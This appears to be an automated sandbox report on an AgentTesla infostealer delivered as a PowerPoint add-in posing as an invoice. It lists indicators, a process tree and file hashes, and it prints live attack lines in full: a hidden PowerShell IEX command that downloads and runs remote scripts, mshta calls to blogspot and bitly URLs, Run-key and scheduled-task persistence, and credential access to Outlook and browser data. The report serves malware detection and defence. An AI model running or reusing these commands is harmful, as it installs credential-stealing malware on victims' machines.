Analysis
- max time kernel: 128s
- max time network: 149s
- platform: windows10_x64
- resource: win10-en-20210920
- submitted: 22-10-2021 04:59

Static task: static1

Behavioral task: behavioral1
- Sample: Invoice 140923.ppam
- Resource: win7-en-20211014

Behavioral task: behavioral2
- Sample: Invoice 140923.ppam
- Resource: win10-en-20210920

General
- Target: Invoice 140923.ppam
- Size: 8KB
- MD5: 5d1279434725ccad24da08658d073a23
- SHA1: 5bd8e406df2a5547bf74fefde17a6a7e4b51358e
- SHA256: b56a00462c6fdfd3fc68869ecda35f6832bee4cdcb81e06bf85b3e4c3336fd77
- SHA512: 9977a2a96b7aa32d4268423adef7b5cee2ae36e7aa6c42a886f1003c845cf71cccd14b6d3e264e0b637a9a2f2f19236d885c75cf60b9d3a5f2a8598a6ddc68f6
Malware Config
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
  - mshta.exe (pid 2188), spawned by POWERPNT.EXE (pid 3612): Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process
- AgentTesla Payload (3 IoCs)
  Yara matches (resource: rule):
  - behavioral2/memory/2036-325-0x000000000043752E-mapping.dmp: family_agenttesla
  - behavioral2/memory/3204-392-0x000000000043752E-mapping.dmp: family_agenttesla
  - behavioral2/memory/3204-398-0x0000000004CD0000-0x00000000051CE000-memory.dmp: family_agenttesla
- Blocklisted process makes network request (11 IoCs)
  Processes (network flow, pid, process):
  - flows 33, 36, 41, 43, 47, 50, 51, 53, 54, 56: pid 2188, mshta.exe
  - flow 58: pid 2300, powershell.exe
- Drops file in Drivers directory (2 IoCs)
  Processes:
  - File opened for modification: C:\Windows\system32\drivers\etc\hosts (jsc.exe)
  - File opened for modification: C:\Windows\system32\drivers\etc\hosts (RegAsm.exe)
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTP, 6 IoCs)
  Processes:
  - Key opened: \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (jsc.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (jsc.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (jsc.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegAsm.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegAsm.exe)
  - Key opened: \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegAsm.exe)
- Adds Run key to start application (2 TTPs, 5 IoCs)
  Processes:
  - Set value (str): \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%1230948@machearkalonikahdi.blogspot.com/p/15.html\"" (mshta.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_b0f3ef832df447e0b4540d1b55406b51.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_1bc433a276794dd08a29271d95e2f910.txt').GetResponse().GetResponseStream()).ReadToend());" (mshta.exe)
  - Key created: \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run (mshta.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%1230948@migimigichuchuchacha.blogspot.com/p/15.html\"" (mshta.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%1230948@gagamutakakachota.blogspot.com/p/15.html\"" (mshta.exe)
- Suspicious use of SetThreadContext (2 IoCs)
  Processes:
  - PID 2300 (powershell.exe) set thread context of 2036 (jsc.exe)
  - PID 2300 (powershell.exe) set thread context of 3204 (RegAsm.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes:
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (POWERPNT.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (POWERPNT.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (POWERPNT.EXE)
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes:
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (POWERPNT.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (POWERPNT.EXE)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (POWERPNT.EXE)
- Kills process with taskkill (2 IoCs)
  Processes:
  - pid 4636, taskkill.exe
  - pid 4788, taskkill.exe
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
  - pid 3612, POWERPNT.EXE
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes:
  - pid 3440, dw20.exe (2 events)
  - pid 2300, powershell.exe (3 events)
  - pid 2036, jsc.exe (2 events)
  - pid 3204, RegAsm.exe (2 events)
- Suspicious behavior: SetClipboardViewer (1 IoC)
  Processes:
  - pid 3204, RegAsm.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes:
  - Token: SeDebugPrivilege, pid 4636, taskkill.exe
  - Token: SeDebugPrivilege, pid 4788, taskkill.exe
  - Token: SeDebugPrivilege, pid 2300, powershell.exe
  - Token: SeDebugPrivilege, pid 2036, jsc.exe
  - Token: SeDebugPrivilege, pid 3204, RegAsm.exe
- Suspicious use of SetWindowsHookEx (5 IoCs)
  Processes:
  - pid 3612, POWERPNT.EXE (3 events)
  - pid 2036, jsc.exe
  - pid 3204, RegAsm.exe
- Suspicious use of WriteProcessMemory (32 IoCs)
  Processes (source PID wrote to memory of target PID; repeated events counted):
  - PID 3612 (POWERPNT.EXE) wrote to memory of 2188 (mshta.exe): 2 events
  - PID 2188 (mshta.exe) wrote to memory of 4636 (taskkill.exe): 2 events
  - PID 2188 (mshta.exe) wrote to memory of 4788 (taskkill.exe): 2 events
  - PID 2188 (mshta.exe) wrote to memory of 1460 (schtasks.exe): 2 events
  - PID 2188 (mshta.exe) wrote to memory of 2300 (powershell.exe): 2 events
  - PID 2188 (mshta.exe) wrote to memory of 3440 (dw20.exe): 2 events
  - PID 2300 (powershell.exe) wrote to memory of 2036 (jsc.exe): 8 events
  - PID 2300 (powershell.exe) wrote to memory of 4068 (csc.exe): 2 events
  - PID 4068 (csc.exe) wrote to memory of 2172 (cvtres.exe): 2 events
  - PID 2300 (powershell.exe) wrote to memory of 3204 (RegAsm.exe): 8 events
- outlook_office_path (1 IoC)
  Processes:
  - Key opened: \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegAsm.exe)
- outlook_win_path (1 IoC)
  Processes:
  - Key opened: \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegAsm.exe)
Processes (nested by parent/child relationship)
- Image: C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Invoice 140923.ppam" /ou ""
  Signatures: Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - Image: C:\Windows\System32\mshta.exe
    Command line: "C:\Windows\System32\mshta.exe" https://www.bitly.com/wdowdpowdlwdprufhjwijjd
    Signatures: Process spawned unexpected child process; Blocklisted process makes network request; Adds Run key to start application; Suspicious use of WriteProcessMemory
    - Image: C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im winword.exe
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - Image: C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_b0f3ef832df447e0b4540d1b55406b51.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_1bc433a276794dd08a29271d95e2f910.txt').GetResponse().GetResponseStream()).ReadToend());
      Signatures: Blocklisted process makes network request; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        Signatures: Drops file in Drivers directory; Accesses Microsoft Outlook profiles; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
      - Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2B13.tmp" "c:\Users\Admin\AppData\Local\Temp\1241ci5p\CSCD51FD894AC144AEAA2F987FF16747D16.TMP"
      - Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Signatures: Drops file in Drivers directory; Accesses Microsoft Outlook profiles; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: SetClipboardViewer; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; outlook_office_path; outlook_win_path
    - Image: C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%1230948@kumakahchachi.blogspot.com/p/15.html\""
      Signatures: Creates scheduled task(s)
    - Image: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
      Command line: dw20.exe -x -s 2912
      Signatures: Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.dll
  MD5: c387386dec8391ecf3027d668c487923
  SHA1: 984444fbd377dbcffe8ba2761de24ddd0cc6fac4
  SHA256: 1ae5d2f24f53d966cee4e62ab3a2fe92bee19ba85cab4165b3200af2fc9c39de
  SHA512: bad92c568cb6b92719483290b459e24ffb5d44dae881e85064e62da6a857bd355ad0413cc2957f3d6a4b2eee1f62e4f43b89dcf17879a63af92a1f5df6cc483b
- C:\Users\Admin\AppData\Local\Temp\RES2B13.tmp
  MD5: c1ca2418445211426574599aa341f3e3
  SHA1: af5db3ed03a9aa37bd5ad8dd2dd7e75eb3c94a40
  SHA256: 17a5e183c9e68e2f781cba0f56c5481914fb69e55abebb108baf3499150675aa
  SHA512: d791a5199a016267bee9c41e48416e28a3f8fac2a866ec430f7b11c54b0c50fef5e3e85f7428947573721358fd6ac2005202eb22c33f941d4205868e0a0fd322
- C:\Windows\system32\drivers\etc\hosts
  MD5: 5b2d17233558878a82ee464d04f58b59
  SHA1: 47ebffcad0b4c358df0d6a06ef335cb6aab0ab20
  SHA256: 5b036588bb4cad3de01dd04988af705da135d9f394755080cf9941444c09a542
  SHA512: d2aec9779eb8803514213a8e396b2f7c0b4a6f57de1ee84e9db0343ee5ff093e26bb70e0737a6681e21e88898ef5139969ff0b4b700cb6727979bd898fdbc85b
- \??\c:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.0.cs
  MD5: e03b1e7ba7f1a53a7e10c0fd9049f437
  SHA1: 3bb851a42717eeb588eb7deadfcd04c571c15f41
  SHA256: 3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427
  SHA512: a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f
- \??\c:\Users\Admin\AppData\Local\Temp\1241ci5p\1241ci5p.cmdline
  MD5: a83664a824d1bbad36c9b129c994107a
  SHA1: ef12ce920e87c2ecb624cdcb024e045de8c575f8
  SHA256: 2011b1d55fb39b05b420ea8c13787a5a9ee3ac79ec918c336cc26f669e1506ac
  SHA512: 7b4a316f815ced28db84c494ebf939d9b824bb5cbc224e3ff5a0b91ae4173a67d846e4312d07fee9872d1beaa4f3fa08f7d495d212c8987f3348f70715427b0f
- \??\c:\Users\Admin\AppData\Local\Temp\1241ci5p\CSCD51FD894AC144AEAA2F987FF16747D16.TMP
  MD5: aa68a47ab2b40d3fb10ed97e9c72015c
  SHA1: 99037f728e0a4c560c04444475b70e593fb545a4
  SHA256: 6787a5493494d3f5d0ade491e5bef8873a343843318d85cf5b42acc567d95213
  SHA512: ea5f713046ee276896504d295de71bbb5c74e40f3e8acc8a4da8f123e93003eb7ad96003138ea5bc103a85f712673d8f0981e65a8a7a0113650374970240b4ca
- memory/1460-301-0x0000000000000000-mapping.dmp
- memory/2036-407-0x0000000005640000-0x0000000005B3E000-memory.dmp (5.0MB)
- memory/2036-325-0x000000000043752E-mapping.dmp
- memory/2036-334-0x0000000005640000-0x0000000005B3E000-memory.dmp (5.0MB)
- memory/2172-386-0x0000000000000000-mapping.dmp
- memory/2188-263-0x0000000000000000-mapping.dmp
- memory/2300-302-0x0000000000000000-mapping.dmp
- memory/2300-318-0x0000016879E86000-0x0000016879E88000-memory.dmp (8KB)
- memory/2300-316-0x0000016879E80000-0x0000016879E82000-memory.dmp (8KB)
- memory/2300-317-0x0000016879E83000-0x0000016879E85000-memory.dmp (8KB)
- memory/3204-409-0x0000000004CD0000-0x00000000051CE000-memory.dmp (5.0MB)
- memory/3204-392-0x000000000043752E-mapping.dmp
- memory/3204-398-0x0000000004CD0000-0x00000000051CE000-memory.dmp (5.0MB)
- memory/3440-303-0x0000000000000000-mapping.dmp
- memory/3612-120-0x0000024175E50000-0x0000024175E52000-memory.dmp (8KB)
- memory/3612-128-0x00007FFB4EDD0000-0x00007FFB4EDE0000-memory.dmp (64KB)
- memory/3612-116-0x00007FFB51920000-0x00007FFB51930000-memory.dmp (64KB)
- memory/3612-117-0x00007FFB51920000-0x00007FFB51930000-memory.dmp (64KB)
- memory/3612-248-0x00000241074D0000-0x00000241074D4000-memory.dmp (16KB)
- memory/3612-129-0x00007FFB4EDD0000-0x00007FFB4EDE0000-memory.dmp (64KB)
- memory/3612-118-0x00007FFB51920000-0x00007FFB51930000-memory.dmp (64KB)
- memory/3612-122-0x0000024175E50000-0x0000024175E52000-memory.dmp (8KB)
- memory/3612-119-0x0000024175E50000-0x0000024175E52000-memory.dmp (8KB)
- memory/3612-115-0x00007FFB51920000-0x00007FFB51930000-memory.dmp (64KB)
- memory/3612-121-0x00007FFB51920000-0x00007FFB51930000-memory.dmp (64KB)
- memory/4068-383-0x0000000000000000-mapping.dmp
- memory/4636-299-0x0000000000000000-mapping.dmp
- memory/4788-300-0x0000000000000000-mapping.dmp